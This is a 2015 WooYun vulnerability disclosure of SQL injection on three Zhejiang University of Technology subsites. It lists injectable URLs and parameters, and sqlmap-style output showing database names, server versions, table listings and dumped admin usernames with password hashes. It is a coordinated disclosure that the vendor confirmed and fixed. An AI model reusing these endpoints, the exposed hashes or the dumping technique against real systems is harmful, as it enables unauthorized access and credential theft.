
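Vulnerability summary

Bug ID: wooyun-2015-0147354

Title: Zhejiang University of Technology: GET injection on three subsites, submitted as one report

Vendor: zjut.edu.cn

Author: 路人甲

Submitted: 2015-10-18 18:38

Fixed: 2015-12-03 11:22

Publicly disclosed: 2015-12-03 11:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]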



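Vulnerability details

Disclosure status:

2015-10-18: Details reported to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in related fields
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public

Brief description:

RT (see title)

Detailed description: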

1.http://www.jxxyxnfz.zjut.edu.cn/Front/SearchList.aspx?type=
available databases [7]:
[*] HaikanOA
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
web server operating system: Windows 2003
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[08:23:36] [INFO] fetching current database
current database: 'HaikanOA'
[08:26:07] [INFO] fetching tables for database: HaikanOA
[08:26:08] [INFO] the SQL query used returns 40 entries
[08:26:08] [INFO] retrieved: "dbo.achievement"
[08:26:08] [INFO] retrieved: "dbo.admin"
[08:26:08] [INFO] retrieved: "dbo.Answer"
[08:26:09] [INFO] retrieved: "dbo.AnswerScore"
[08:26:09] [INFO] retrieved: "dbo.ApplyProject"
[08:26:09] [INFO] retrieved: "dbo.ApplyStudent"
[08:26:10] [INFO] retrieved: "dbo.BBSPost"
[08:26:10] [INFO] retrieved: "dbo.BBSPostSon"
[08:26:10] [INFO] retrieved: "dbo.BBSReply"
[08:26:11] [INFO] retrieved: "dbo.Booking"
[08:26:11] [INFO] retrieved: "dbo.Courses"
[08:26:11] [INFO] retrieved: "dbo.CourseVideo"
[08:26:11] [INFO] retrieved: "dbo.Desk"
[08:26:12] [INFO] retrieved: "dbo.download"
[08:26:12] [INFO] retrieved: "dbo.FloatTable"
[08:26:12] [INFO] retrieved: "dbo.FridendlyLink"
....
Database: HaikanOA
Table: dbo.admin
[8 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| id | int |
| lasttime | datetime |
| linestate | nvarchar |
| photo | nvarchar |
| roleid | int |
| truename | nvarchar |
| username | varchar |
| userpassword | varchar |
+--------------+----------+
Database: HaikanOA
Table: dbo.admin
[3 entries]
+-----------+----------------------------------+
| username | userpassword |
+-----------+----------------------------------+
| 100407101 | 4550D3832C5B130D |
| 100407102 | 4550D3832C5B130D |
| admin | AD41E5F6D383B8DEC533DCB0109FD9E8 |
+-----------+----------------------------------+
2.http://www.msexsgz.zjut.edu.cn/ShowNewsPageAction.do?newsID=622
available databases [5]:
[*] hcxsgz
[*] information_schema
[*] mysql
[*] test
[*] xsgz
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:02:01] [INFO] fetching current database
[10:02:01] [INFO] retrieved: xsgz
current database: 'xsgz'
3.
http://www.ie.zjut.edu.cn/msc/index.php/Article/page?cid=18
http://www.ie.zjut.edu.cn/msc/index.php/Article/article2?cid=15
available databases [2]:
[*] iemsc
[*] information_schema
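I did not go on to dump the data for 2 and 3.

Proof of vulnerability:

RT (see title)

Remediation:

Filter input properly, and also change some of the easily guessed back-end entry points (such as the teacher login back end, etc.).

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-10-19 11:22

Vendor reply:

Thank you for your help

Latest status:

None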